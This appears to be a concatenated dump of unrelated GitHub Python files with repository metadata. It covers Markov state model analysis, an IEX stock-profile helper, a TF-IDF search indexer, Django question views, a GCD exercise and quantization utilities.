np.zeros(num_states)\n\n #subtract identity from P to get R\n for i in range(num_states):\n R[i][i] -= 1.0 - 1e-16\n\n #set boundary conditions\n #initial state\n for i in initials:\n for j in range(num_states):\n if j == i:\n R[i,j] = 1.0\n else:\n R[i,j] = 0.0\n\n #target state\n for t in targets:\n for j in range(num_states):\n if j == t:\n R[t,j] = 1.0\n else:\n R[t,j] = 0.0\n\n #set vector\n b[targets] = 1.0\n\n #do the solve and return the result\n x = np.linalg.solve(R,b)\n return x\n\ndef computeMFPT(P, initial, target, num_states):\n #compute mean first passage time from initial states to target states\n\n #need to solve the linear system tau=1+Q*tau\n\n #convert single valued initial and target to lists\n initials = list(np.array([initial]).flat)\n targets = list(np.array([target]).flat)\n\n #get list of absorbing states to remove\n absorbing = []\n for i in range(num_states):\n if P[i,i] > 1-3e-2:\n absorbing.append(i)\n if i in initials:\n initials.remove(i)\n\n # print(targets)\n # print(\"Absorbing: {}\".format(absorbing))\n\n #init the system matrix and rhs\n Q = np.array(P.todense())\n\n #construct Q by removing rows and columns in the target from P\n to_remove = list(set(targets) | set(absorbing))\n Q = np.delete(Q, to_remove, 0)\n Q = np.delete(Q, to_remove, 1)\n\n #solve the system\n off_target = num_states - len(to_remove)\n b = np.ones(off_target)\n A = np.identity(off_target)*(1+1e-10)-Q\n # Ainv = np.linalg.pinv(A)\n # tau = np.matmul(Ainv,b)\n tau = np.linalg.solve(A, b)\n print(A*tau)\n print(tau)\n\n #get the indexing map due to removing the target states\n new_indices = []\n count = 0\n for i in range(num_states):\n if i in targets or i in absorbing:\n count +=1\n new_indices.append(-1)\n else:\n new_indices.append(i-count)\n\n #average the mean first passage times over the initial states\n avg = 0\n for i in range(len(initials)):\n new_index = new_indices[initials[i]]\n value = tau[new_index]\n print(i, new_index, value)\n avg += value\n\n avg /= len(initials)\n return avg\n\n\ndef computeMFPTsampling(P, initial, target, num_states, inv_map, globalActive):\n #estimate mean first passage times by sampling\n\n #convert single valued initial and target to lists\n initials = list(np.array([initial]).flat)\n targets = list(np.array([target]).flat)\n\n #set sampling parameters\n num_samples = 100\n max_iters = 256\n\n #choose initial state at random\n i = random.choice(initials)\n\n #do sampling\n average = 0\n for sample in range(num_samples):\n current_state = i\n # input()\n for t in range(max_iters):\n\n #get the row of P cooresponding to current state\n row = P.getrow(current_state)\n row = row.A[0]\n\n #sample from the row\n current_state = np.random.choice(range(len(row)),p=row)\n # print(t,inv_map[globalActive[current_state]])\n if current_state in targets:\n print(\"Hit target in {} steps\".format(t))\n average += t+1\n break\n\n average /= num_samples\n\n return average\n\n\n\n\n\n\n##################################################################\n############# MSM Convergence Testing ###########################\n##################################################################\n\n\ndef time_scale_analysis(dtraj, LAGS, Eh, Ep, num_states, k = 10):\n #compute MSMs at various lag times, plot timescales, do markovity test\n\n #get number of tests to do and init storage for timescales\n num_lags = len(LAGS)\n timescales = np.zeros((k, num_lags), dtype=float)\n\n for i in range(num_lags):\n lag = LAGS[i]\n\n #print progress message\n print(\"Computing MSM {} of {}\".format(i+1,num_lags))\n\n M = MSM(dtraj, lag, Eh, Ep, num_states)\n t = M.computeTimescales(k)\n timescales[:,i] = np.array(t)\n\n \n #plot the timescales\n plt.figure()\n for i in range(3,k):\n plt.plot(LAGS, timescales[i])\n\n plt.show()\n\n\n return\n\ndef convergenceLag(folder, initial_state, target_state, data_version='', refine=False):\n '''\n Test convergence of the MSMs by constructing yield curves from initial_state to \n target_state as a function of lag time. The curves involve all the timescales\n important for that particular assembly, so this should be more robust than a \n CK test\n\n Set a selection of lag times to test apriori, construct the MSMs for each lag time,\n then save them together for later re-use.\n '''\n\n #set the desired lag times and other constant parameters\n LAGS = [1, 25, 50, 75, 100, 125, 150]\n animate_time = 25\n Ep = float(folder.split('P')[1].split('H')[0])\n Eh = float(folder.split('P')[1].split('H')[1].split('/')[0])\n\n #get the stateDict dictionary mapping\n stateDict, refineList = loadStateDict(data_version=data_version, refine=refine)\n\n #get the inverse mapping\n inv_map = {v: k for k, v in stateDict.items()}\n\n #get indices of the initial and target states\n num_states = len(stateDict)\n initial_index = stateDict[initial_state]\n target_index = stateDict[target_state]\n print(\"Target state index is {}\".format(target_index))\n print(\"There are {} states\".format(num_states))\n\n #try to load an existing collection of MSMs at the lag time\n msm_conv_data_loc = \"../MSM/msm_tests/convP{}H{}\".format(Ep,Eh)\n try:\n\n with open(msm_conv_data_loc, 'rb') as f:\n MSM_list = pickle.load(f)\n print(\"MSM convergence data loaded from {}\".format(msm_conv_data_loc))\n\n except:\n\n #create the MSMs at each lag from scratch\n MSM_list = []\n for k in range(len(LAGS)):\n lag = LAGS[k]\n M = createMSM(folder, lag, data_version=data_version, refine=refine,\n longT=True, shortT=True, otherT=True)\n MSM_list.append(M)\n\n #pickle the list of MSMs for later use\n with open(msm_conv_data_loc, 'wb') as f:\n pickle.dump(MSM_list, f)\n\n #loop over the MSM list and compute yield curves for the desired states\n target_times = []\n target_probs = []\n use_lags = [25, 125, 150]\n for k in range(len(LAGS)):\n\n lag = LAGS[k]\n if lag not in use_lags:\n continue\n\n #construct the MSM object\n M = MSM_list[k]\n\n #get the target probability evolution\n num_steps = int(800000.0 / (animate_time*lag))\n t, p = M.solveForwardEquationActive(initial_index, num_steps)\n t = t * animate_time\n t /= 1e5\n target_times.append(t)\n global_t = M.fullToNew[target_index]\n target_probs.append(p[:,global_t])\n\n #get the sampled values\n print(\"Computing fc estimate from sampling\")\n traj_folder = getTrajFolder(M, initial_state)\n sampling_target = (target_state[0], target_state[1], target_state[-1])\n t_s, p_s, samples = computeSampledTargetProbability(folder, sampling_target, animate_time)\n t_s /= 1e5\n\n #plot the data and format it\n fig = plt.figure(1)\n ax = fig.add_subplot(111)\n\n #plot sampled data\n plt.plot(t_s, p_s, '-')\n\n #plot each MSM data\n for k in range(len(target_probs)):\n plt.plot(target_times[k],target_probs[k])\n\n #label \n num_digits = 5\n ax.set_xlabel(r\"t/$10^{}t_0$\".format(num_digits), fontsize = 20)\n ax.set_ylabel(\"Yield\", fontsize = 20)\n\n #set num ticks\n plt.locator_params(axis='y', nbins=5)\n plt.locator_params(axis='x', nbins=4)\n\n #set tick label sizes\n ax.tick_params(axis='x', labelsize=16)\n ax.tick_params(axis='y', labelsize=16)\n\n #remove whitespace and plot\n plt.tight_layout()\n # plt.legend([\"Sampled data\", \"MSM Lag 1\", \"MSM Lag 25\",\"MSM Lag 50\",\"MSM Lag 75\",\n # \"MSM Lag 100\",\"MSM Lag 125\",\"MSM Lag 150\"], prop={'size':15})\n plt.show()\n\n return\n\n\ndef convergenceSamples(folder, data_version='', refine=False):\n #test the convergence of the MSM as a function of number of samples\n\n #get the stateDict dictionary mapping\n stateDict, refineList = loadStateDict(data_version=data_version, refine=refine)\n\n #get the inverse mapping\n inv_map = {v: k for k, v in stateDict.items()}\n\n #get info about the state space and target\n num_states = len(stateDict)\n initial_index = stateDict[(12,29,27)]\n target_index = stateDict[(12,29,27)]\n target_state = (12,29,27)\n print(\"Target state index is {}\".format(target_index))\n print(\"There are {} states\".format(num_states))\n\n #get the ensemble energies\n Ep = float(folder.split('P')[1].split('H')[0])\n Eh = float(folder.split('P')[1].split('H')[1].split('/')[0])\n\n #set lag and animation period\n lag = 100\n animate_time = 25\n num_steps = int(700000.0 / (animate_time*lag))\n\n #make list for all trajectories\n dtrajs = []\n\n #get all npy files\n trajs = fnmatch.filter(os.listdir(folder), 'traj*.npy')\n\n #append trajectories from sims to dtrajs \n print(\"Extracting long trajectories. Found {}\".format(len(trajs)))\n extractTrajectories(dtrajs, folder, trajs, stateDict)\n\n #create MSMs gradually using more data\n num_trajs = [3, 6, 12, 24, 48, 96, 188]\n target_probs = []\n for k in range(len(num_trajs)):\n nt = num_trajs[k]\n\n #construct the MSM object\n M = MSM(dtrajs[0:nt], lag, Eh, Ep, num_states)\n\n #get the target probability evolution\n t, p = M.solveForwardEquationActive(initial_index, num_steps)\n t = t * animate_time\n t_ind = M.fullToNew[target_index]\n target_probs.append(p[:,t_ind])\n\n #get the sampled values\n print(\"Computing fc estimate from sampling\")\n sampling_target = (target_state[0], target_state[1], target_state[-1])\n t_s, p_s, samples = computeSampledTargetProbability(folder, sampling_target, animate_time)\n\n #plot\n plt.figure()\n\n #plot sampled data\n plt.plot(t_s, p_s, '-')\n\n #plot each MSM data\n for k in range(len(num_trajs)):\n plt.plot(t,target_probs[k])\n\n #label \n plt.xlabel(\"Time\")\n plt.ylabel(\"Target State Probability\")\n plt.legend([\"Sampled data\", \"MSM-3\", \"MSM-6\",\"MSM-12\", \"MSM-24\",\"MSM-48\", \"MSM-96\",\"MSM-188\"])\n\n \n #show\n plt.show()\n\n return\n\n\n##################################################################################\n################## Refine State Space Discretization #############################\n##################################################################################\n\n\ndef comparePijByStartState(folder1, folder2):\n '''\n Test how transition matrix entries chage in an MSM when adding additional sampling\n data that was initialized in a different initial configuration. Compare values in the\n augmented MSM to base values, and check if they are within some multiple of the \n standard sampling error. If so, mark that state as a problem state. Return all such \n states. \n\n This serves as a test for which states the reaction coordinate used is defining\n a state ambiguously, i.e. two distinct microstates with same macrostate. \n '''\n\n #get the stateDict dictionary mapping\n stateDict, refineList = loadStateDict()\n num_states = len(stateDict)\n\n #get the inverse mapping\n inv_map = {v: k for k, v in stateDict.items()}\n\n #set a lag\n lag = 100\n animate_time = 25\n\n #get the base set of trajs to construct an MSM\n dtrajs = []\n trajs = fnmatch.filter(os.listdir(folder1), 'traj*.npy')\n extractTrajectories(dtrajs, folder1, trajs, stateDict)\n\n #construct the MSM object\n msm1 = MSM(dtrajs, lag, 1.2, 1.4, num_states)\n r,c = msm1.P.nonzero()\n\n #construct the second MSM with additional sampling data used and make another MSM\n trajs = fnmatch.filter(os.listdir(folder2), 'traj*.npy')\n extractTrajectories(dtrajs, folder2, trajs, stateDict)\n msm2 = MSM(dtrajs, lag, 1.2, 1.4, num_states)\n\n #init a list to store the problem states\n identified = []\n\n #set a tolerance for how many standard errors from the estimate is acceptable\n tol = 3\n\n #loop over nonzeros and print differences\n for i in range(len(r)):\n\n #get probability in this index for each MSM\n p1 = msm1.P[r[i],c[i]]\n p2 = msm2.P[r[i],c[i]]\n\n #get counts in base MSM to compute standard error\n c1 = msm1.count_matrix[r[i],c[i]]\n std = np.sqrt(p1*(1-p1)/float(c1))\n\n #check if above the tolerance for being considered\n if (np.abs(p1-p2) > tol*std and std > 1e-5):\n state1 = inv_map[r[i]]\n state2 = inv_map[c[i]]\n print(\"{} -> {}, p1 = {}, p2 = {}, std = {}\".format( \\\n state1, state2, round(p1,4), round(p2,4), round(std,4)))\n identified.append(state1)\n\n #return the identified states\n return identified\n\ndef getStatesToRefine(base_folder):\n #get a list of candidate states for refinement \n\n #list all starting states for the long sims\n start_states = [\"12_29_27\", \"12_30_30\", \"12_30_26\", \"12_31_27\", \"12_31_29\"]\n # start_states = [\"12_29_27\", \"12_30_26\", \"12_31_29\"]\n\n #try to load a file for candidate sets. if no such file, create from scratch\n set_name = \"data/refineStates\"\n try:\n with open(set_name, 'rb') as f:\n candidates = pickle.load(f)\n print(\"Set of candidates loaded from {}\".format(set_name))\n except:\n print(\"File {} not found. Creating candidates from scratch\".format(set_name))\n candidates = set()\n\n #loop over each pair to get states to look at \n for i in range(len(start_states)):\n for j in range(len(start_states)):\n if i != j:\n\n #set the folders containing the data\n f1 = base_folder + \"state\" + start_states[i] + \"/\"\n f2 = base_folder + \"state\" + start_states[j] + \"/\"\n\n #get the states for this pair\n print(\"Comparing data in {} to {}\".format(f1, f2))\n states = comparePijByStartState(f1, f2)\n\n #loop over and add to set\n for state in states:\n candidates.add(state)\n\n #display size of new set\n print(\"Candidate set now has {} states\".format(len(candidates)))\n\n #save the set to disk\n with open(set_name, 'wb') as f:\n pickle.dump(candidates, f)\n print(\"Wrote set of candidate states to {}\".format(set_name))\n\n\n############################################################################\n################### Create MSMs ###########################################\n############################################################################\n\ndef createMSM(folder, lag, data_version='', refine=False, longT=True, shortT=False,\n otherT=False):\n #manually construct an MSM using the trajectories in folder and specified lag\n\n #load the dictionary of states\n stateDict, refineList = loadStateDict(data_version=data_version, refine=refine)\n num_states = len(stateDict)\n\n #get the energy parameters from the folder name\n Ep = float(folder.split('P')[1].split('H')[0])\n Eh = float(folder.split('P')[1].split('H')[1].split('/')[0])\n\n #get a list of discrete trajectories using data in specified folders\n dtrajs = getDtrajs(folder, stateDict, refineList, longT=longT, shortT=shortT,\n otherT=otherT)\n\n #set the minimum observation thresholds based on the trajectory types\n min_count = 1\n min_frame = 2\n if (otherT):\n min_count = 2\n min_frame = 4\n\n #construct the MSM object\n M = MSM(dtrajs, lag, Eh, Ep, num_states, min_count=min_count, min_frame=min_frame)\n\n #return MSM object\n return M\n\ndef batch_make_MSM(lag, data_version = '', refine = False):\n #make an MSM for every input in the parameter map file\n\n #get the parameter values as a function of input number\n H, P, traj_types = getParameterMap()\n\n #loop over the parameter to construct MSMs\n for i in range(35,len(H)):\n\n #get parameter values\n h = H[i]\n p = P[i]\n type_string = traj_types[i]\n\n #parse the type_string into meaningful values\n if (\"N\" in type_string): \n\n #this parameter set is null. Skip MSM creation\n continue\n\n else:\n\n #get booleans for each sim type\n longT, shortT, otherT = getTrajType(type_string)\n\n\n #set folder path\n folder = \"../trajectories/P{}H{}/\".format(p,h)\n\n #check that the folder exists, continue to next set if not\n if (not os.path.exists(folder)):\n continue\n\n #create the MSM\n print(\"Creating MSM {} using parameters P{}H{}\".format(i,p,h))\n M = createMSM(folder, lag, data_version=data_version, refine=refine,\n longT=longT, shortT=shortT, otherT=otherT)\n\n #pickle the MSM according to its index number and the run type\n out_file = \"msm\" + data_version + \"/msm\"\n if (refine):\n out_file += \"R\"\n out_file += \"{}\".format(i)\n with open(out_file, 'wb') as f:\n pickle.dump(M, f)\n\n return\n\n\n\nif __name__ == \"__main__\":\n\n #create one MSM\n folder = \"../trajectories/P1.4H1.45/\"\n lag = 125\n # initial_state = (12,29,60,57,27)\n # initial_state = (12,30,60,60,26)\n # initial_state = (12,31,29)\n # initial_state = (12,30,30)\n # initial_state = (12,31,27)\n initial_state = (0,0,0)\n # initial_state = (10,20,12)\n\n # target_state = (12,30,30)\n target_state = (12,29,60,57,27)\n # target_state = (12,30,60,60,26)\n # target_state = (12,30,26)\n # target_state = (12,31,29)\n # target_state=initial_state\n\n #createMSM(folder,lag,\"V1\",False)\n\n #do testing on MSM - compare dynamics curves or assess convergence\n\n # MSMtestingScratch(folder, lag, data_version='',refine=True,\n # longT=True, shortT=True, otherT=True, \n # initial_state=initial_state,target_state=target_state)\n\n # MSMtestingLoad(\"msm_tests/msmP1.25H1.4\", data_version='', refine=True,\n # initial_state=initial_state, target_state=target_state)\n\n #27 and 6 are adjacent\n # MSMtestingLoad(\"msm/msmR7\", data_version='', refine=True,\n # initial_state=initial_state, target_state=target_state)\n\n #convergenceSamples(folder+\"state12_29_27/\")\n convergenceLag(folder, initial_state, target_state, refine=True)\n\n #refine the state space discretization by comparing disassembly trajs in folder\n # getStatesToRefine(folder)\n\n #batch make MSMs without any extraneous output\n # batch_make_MSM(lag, refine=True)\n\n\n #make a refine list manually\n # stateDict, refineList = loadStateDict()\n # num_states = len(stateDict)\n # inv_map = {v: k for k, v in stateDict.items()}\n\n # refineList = [inv_map[i] for i in range(num_states)]\n # print(refineList)\n\n # set_name = \"data/refineStates\"\n # with open(set_name, 'wb') as f:\n # pickle.dump(refineList, f)\n # print(\"Wrote set of candidate states to {}\".format(set_name))\n\n","repo_name":"onehalfatsquared/protocolOptMSM","sub_path":"MSM/manualMSM.py","file_name":"manualMSM.py","file_ext":"py","file_size_in_byte":54917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"44045581177","text":"from ..Model.models import Company\r\nimport requests\r\n\r\n\r\n#search stock's profile\r\ndef insert_company(symbol):\r\n detail = requests.get(\r\n 'https://cloud.iexapis.com/v1/stock/%s/company?token=pk_31fcf86b343d49269bb965ad718fbec6' % symbol)\r\n detail = detail.json()\r\n companyName = detail['companyName']\r\n industry = detail['industry']\r\n website = detail['website']\r\n CEO = detail['CEO']\r\n sector = detail['sector']\r\n country = detail['country']\r\n company = Company()\r\n company.symbol = symbol\r\n company.company = companyName\r\n company.industry = industry\r\n company.website = website\r\n company.CEO = CEO\r\n company.sector = sector\r\n company.country = country\r\n company.save()\r\n\r\n\r\n\r\ndef find_company(symbol):\r\n result = Company.objects.get(symbol=symbol)\r\n content = {'symbol', result.symbol,\r\n 'company', result.company,\r\n 'industry', result.industry,\r\n 'website', result.website,\r\n 'CEO', result.CEO,\r\n 'sector', result.sector,\r\n 'country', result.country}\r\n return content","repo_name":"Liang-Rui/Stock-Portfolio-Management-System","sub_path":"backend/src/stock/DAO/ComanyDAO.py","file_name":"ComanyDAO.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"99"} +{"seq_id":"1563223555","text":"# -*- coding: utf-8 -*-\nimport shelve\nimport nltk\nimport json\nfrom nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nimport time\nimport math\nimport heapq\n\n# stopwords list from nltk\nstemmer = PorterStemmer()\ntokenizer = RegexpTokenizer(r'\\w+')\n\ndata_path = 'test_corpus.json'\n\n\n############ Building Posting List ####################\n# load_data\ndef loadJson(data_path):\n database = shelve.open('database', writeback=False)\n film_data = open(data_path).read()\n data = json.loads(film_data)\n database['corpus'] = data\n database.close()\n return data\n\n\n# indexAll\ndef indexAllData(data):\n database = shelve.open('database', writeback=False)\n posting_list = {}\n for i in range(0, len(data)) :\n\n words_list = tokenize_stemming(data[str(i)]['text'])\n for word in words_list :\n\n if word not in posting_list:\n posting_list[word] = {}\n if i not in posting_list[word]:\n posting_list[word][i] = 0\n\n posting_list[word][i] = posting_list[word][i] + 1\n if i % 500 == 0:\n print('index finish ' + str(i))\n # posting_list[word].append(i)\n if i > 2049:\n print(i)\n print(\"posting list finished\")\n database['posting_list'] = posting_list\n database.close()\n print(\"store posting list finished\")\n calculate_doc_length()\n return\n\n\ndef get_tf_doc(term, docId):\n\n posting_list = shelve.open('database', writeback=False)['posting_list']\n\n return 1 + math.log(posting_list[term][docId], 10)\n\n# caculate term frequency for a term in search query\ndef get_tf_query(term, query):\n\n raw_tf = 0\n\n for word in query:\n if word == term:\n raw_tf = raw_tf + 1\n\n return 1 + math.log(raw_tf, 10)\n\n# get idf for a term\ndef get_idf(term):\n database = shelve.open('database', writeback=False)\n posting_list = database['posting_list']\n data = database['corpus']\n\n df = len(posting_list[term])\n N = len(data)\n\n res = math.log(float(N)/ float(df), 10)\n return res\n\n\n# return doc_length for a docId\ndef get_doc_length(docId):\n database = shelve.open('database', writeback=False)\n doc_lenth = database['doc_length']\n return doc_lenth[docId]\n\n# calculate weight lenth of all document\ndef calculate_doc_length():\n database = shelve.open('database', writeback=False)\n print('calculate length begin')\n doc_length = {}\n data = database['corpus']\n\n for i in range(0, len(data)) :\n words_list = tokenize_stemming(data[str(i)]['text'])\n doc_len = 0\n for word in set(words_list) :\n tf = get_tf_doc(word, i)\n idf = get_idf(word)\n score = tf * idf\n doc_len = doc_len + score * score\n\n doc_length[i] = math.sqrt(doc_len)\n if i % 500 == 0:\n print('calculate doc_length finish ' + str(i))\n\n database['doc_length'] = doc_length\n return\n\n\n# get cosin score for a query, docId pair\ndef cosin_score(query, docId):\n\n score = 0.0\n\n for term in set(query):\n\n score = score + get_tf_doc(term, docId) * get_idf(term) * get_tf_query(term, query) * get_idf(term) / get_doc_length(docId)\n\n return score\n\n# rank all result based on cosi score\ndef rank_result(query, movieId):\n\n score = {}\n ranked = []\n res_scores = []\n res_movieId = []\n for i in movieId:\n score[i] = cosin_score(query, i)\n heapq.heappush(ranked, (score[i], i))\n\n res = heapq.nlargest(len(movieId), ranked)\n\n for i in range(0, len(res)):\n res_movieId.append(res[i][1])\n res_scores.append(res[i][0])\n\n return res_movieId, res_scores\n\n# tokenize() to generate all possible words\n\n\ndef tokenize_stemming(raw_text):\n\n words = tokenizer.tokenize(raw_text)\n stem_word = []\n for word in words :\n stem_word.append(stemmer.stem(word))\n return set(stem_word)\n\n\ndef storeStopWords():\n database = shelve.open('database', writeback=False)\n database['stopWords'] = set(stopwords.words('english'))\n database.close()\n\n\n################## Process Input query And Search #########################\n\nclass SearchEngine:\n\n def search(self, query) :\n pre_result = self.preprocess(query)\n pre_result['movie_ids'] = []\n if pre_result['unKnown']:\n return pre_result\n new_query = pre_result['realQuery']\n pre_result['movie_ids'], pre_result['scores'] = self.findMovieId(new_query)\n\n return pre_result\n\n\n def preprocess(self, query):\n database = shelve.open('database', writeback=False)\n res = {}\n res['stopWords'] = []\n res['unKnown'] = []\n res['realQuery'] = []\n posting_list = database['posting_list']\n stopWords = database['stopWords']\n\n words = tokenizer.tokenize(query)\n for word in words:\n if word in stopWords:\n res['stopWords'].append(word.encode('ascii', 'ignore'))\n else :\n wd = stemmer.stem(word).encode('ascii', 'ignore')\n if wd not in posting_list:\n res['unKnown'].append(wd)\n else :\n res['realQuery'].append(wd)\n database.close()\n return res\n\n\n def findMovieId(self, query):\n database = shelve.open('database', writeback=False)\n movieId = []\n if len(query) == 0 :\n return movieId, []\n\n posting_list = database['posting_list']\n new_query = sorted(query, key = lambda word : len(posting_list[word]))\n movieId = sorted(posting_list[new_query[0]].keys())\n if len(query) == 1 :\n movieId, rank_score = rank_result(query, movieId)\n return movieId, rank_score\n print(len(movieId))\n for word in new_query[1:]:\n movieId = self.intersect(movieId, sorted(posting_list[word].keys()))\n\n movieId, rank_score = rank_result(query, movieId)\n\n return movieId, rank_score\n\n def intersect(self, idList1, idList2):\n print(len(idList2))\n i = 0\n j = 0\n res = []\n while (i < len(idList1) and j < len(idList2)) :\n if idList1[i] < idList2[j]:\n i = i + 1\n elif idList1[i] > idList2[j]:\n j = j + 1\n else:\n res.append(idList1[i])\n i = i + 1\n j = j + 1\n return res\n\n\n def get_movie_data(self, doc_id):\n database = shelve.open('database', writeback=False)\n corpus = database['corpus']\n\n return corpus[doc_id]\n\n\n def get_movie_snippet(self, doc_id):\n\n database = shelve.open('database', writeback=False)\n data = database['corpus']\n\n try:\n title = data[str(doc_id)]['title']\n except:\n title = ''\n\n try:\n text = data[str(doc_id)]['text']\n except:\n text = ''\n\n return (doc_id, title, text)\n\n\nif __name__ == '__main__':\n\n start_time = time.clock()\n print('Build Start!')\n data = loadJson(data_path)\n indexAllData(data)\n storeStopWords()\n end_time = time.clock()\n print('Build End!')\n print('Build Time Use ' + str(end_time - start_time) + ' seconds')\n\n\n\n\n","repo_name":"yuchengtang94/ir_hw4","sub_path":"vs_index.py","file_name":"vs_index.py","file_ext":"py","file_size_in_byte":7276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4503097586","text":"from django.shortcuts import render, redirect\nfrom .models import Question, Comment\nfrom .forms import QuestionForm, CommentForm\n\n# Create your views here.\n\ndef index(request):\n questions = Question.objects.all()\n context = {'questions': questions,}\n\n return render(request, 'eithers/index.html', context)\n\n\ndef create(request):\n if request.method == 'POST':\n form = QuestionForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('eithers:index')\n \n # GET 일 때 create.html 을 사용자에게 보여줌\n form = QuestionForm()\n context = {\n 'form': form,\n }\n return render(request, 'eithers/create.html', context)\n\n\ndef detail(request, question_pk):\n question = Question.objects.get(pk=question_pk)\n # 역참조\n comments = question.comments.all()\n comment_form = CommentForm()\n context = {\n 'question': question,\n 'comment_form': comment_form,\n 'comments': comments,\n }\n return render(request, 'eithers/detail.html', context)\n\n# 댓글 생성\ndef comment(request, question_pk):\n question = Question.objects.get(pk=question_pk)\n \n form = CommentForm(request.POST)\n if form.is_valid():\n # 사용자가 직접 question을 입력하지 않으므로\n # views.py 에서 지정해준 후 저장\n comment = form.save(commit=False)\n comment.question = question\n comment.save()\n \n return redirect('eithers:detail', question_pk)\n\ndef random(request):\n # 있는가 없는가\n count = Question.objects.count()\n # 에외처리 먼저\n if count <= 0:\n return redirect('eithers:index')\n \n # 첫번 째 방법 - 가장 쉬운 방법\n question = ra.choice(Question.objects.all())\n return redurect('eithers:detail', question.id)\n\n # 구글링\n # question = Question.objects.order_by('?').first()\n # return redirect('eithers:detail', question.id)\n \n # 데이터가 적을 떄 일반적으로 사용하는 방법\n # max_id 기준으로 randint 사용하기\n max_id = Question.objects.all().aggregate(max_id=Mac('id'))['max_id']\n question_pk = ra.randint(1, max_id)\n if Question.objects.filter(pk=question_pk).exists():\n return redirect('eithers:detail', question_pk)\n \n return redirect('eithers:detail', question.id)","repo_name":"sangmihwang/TIL","sub_path":"lecture/db/230410/config/eithers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4250304879","text":"def GCD(a,b):\n while a%b != 0:\n r = a%b\n a = b\n b = r\n return b\nnumbers = []\nwith open('./Dane_PR2/liczby.txt', 'r') as fileInput:\n for line in fileInput.readlines():\n numbers.append(int(line.rstrip()))\n\nN = len(numbers) \ndividerMax = 0\nfirstNumMax = 0\nlengthMax = 0\n\nfor j in range(N-1):\n length = 1\n firstNum = numbers[j]\n localGCD = numbers[j]\n for i in range(j+1, N):\n n = GCD(localGCD, numbers[i])\n if n > 1:\n localGCD = n\n length += 1\n if n==1 or i == N-1:\n if lengthMax < length:\n dividerMax = localGCD\n lengthMax = length\n firstNumMax = firstNum\n break\nprint(firstNumMax, lengthMax, dividerMax)\nwith open('wyniki4.txt', 'a', encoding='utf-8') as fileOutput:\n fileOutput.write('4.3: \\n')\n fileOutput.write(f'Pierwsza liczba: {firstNumMax} \\n')\n fileOutput.write(f'Długość ciągu: {lengthMax} \\n')\n fileOutput.write(f'Dzielnik: {dividerMax} \\n')\n","repo_name":"Kosaaaaa/matura-informatyka-2019","sub_path":"zad43.py","file_name":"zad43.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1456266396","text":"#!/usr/bin/python3.6 \n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom pathlib import Path\nimport datetime\nimport shutil\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport logging\nimport coloredlogs\nimport os\nimport cv2\nimport torch\nimport functools\nimport numpy as np\nimport math\nfrom torchvision.utils import make_grid\nimport matplotlib.pyplot as plt\nimport random\nfrom decimal import Decimal\n\nfrom option import args\nfrom model.quant_ops import quant_act_pams\n\nfrom model.edge import BitSelector\nfrom model.cadyq import BitSelector as BitSelector_org\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nclass AverageMeter(object):\n def __init__(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n if self.count > 0:\n self.avg = self.sum / self.count\n\n def accumulate(self, val, n=1):\n self.sum += val\n self.count += n\n if self.count > 0:\n self.avg = self.sum / self.count\n\nclass Logger(object):\n def __init__(self, fpath, title=None, resume=False):\n self.file = None\n self.resume = resume\n self.title = '' if title == None else title\n if fpath is not None:\n if resume:\n self.file = open(fpath, 'r')\n name = self.file.readline()\n self.names = name.rstrip().split('\\t')\n self.numbers = {}\n for _, name in enumerate(self.names):\n self.numbers[name] = []\n\n for numbers in self.file:\n numbers = numbers.rstrip().split('\\t')\n for i in range(0, len(numbers)):\n self.numbers[self.names[i]].append(numbers[i])\n self.file.close()\n self.file = open(fpath, 'a')\n else:\n self.file = open(fpath, 'w')\n\n def set_names(self, names):\n if self.resume:\n pass\n # initialize numbers as empty list\n self.numbers = {}\n self.names = names\n for _, name in enumerate(self.names):\n self.file.write(name)\n self.file.write('\\t')\n self.numbers[name] = []\n self.file.write('\\n')\n self.file.flush()\n\n def append(self, numbers):\n assert len(self.names) == len(numbers), 'Numbers do not match names'\n for index, num in enumerate(numbers):\n self.file.write(\"{0:.6f}\".format(num))\n self.file.write('\\t')\n self.numbers[self.names[index]].append(num)\n self.file.write('\\n')\n self.file.flush()\n\n def plot(self, names=None):\n names = self.names if names == None else names\n numbers = self.numbers\n for _, name in enumerate(names):\n x = np.arange(len(numbers[name]))\n plt.plot(x, np.asarray(numbers[name]))\n plt.legend([self.title + '(' + name + ')' for name in names])\n plt.grid(True)\n\n def close(self):\n if self.file is not None:\n self.file.close()\n\n\ndef accuracy(output, target, topk=(1,)):\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\nUSE_CUDA = torch.cuda.is_available()\nFLOAT = torch.cuda.FloatTensor if USE_CUDA else torch.FloatTensor\nfrom torch.autograd import Variable\n\n\ndef to_numpy(var):\n # return var.cpu().data.numpy()\n return var.cpu().data.numpy() if USE_CUDA else var.data.numpy()\n\n\ndef to_tensor(ndarray, volatile=False, requires_grad=False, dtype=FLOAT):\n return Variable(\n torch.from_numpy(ndarray), volatile=volatile, requires_grad=requires_grad\n ).type(dtype)\n\n\ndef sample_from_truncated_normal_distribution(lower, upper, mu, sigma, size=1):\n from scipy import stats\n return stats.truncnorm.rvs((lower-mu)/sigma, (upper-mu)/sigma, loc=mu, scale=sigma, size=size)\n\n\n# 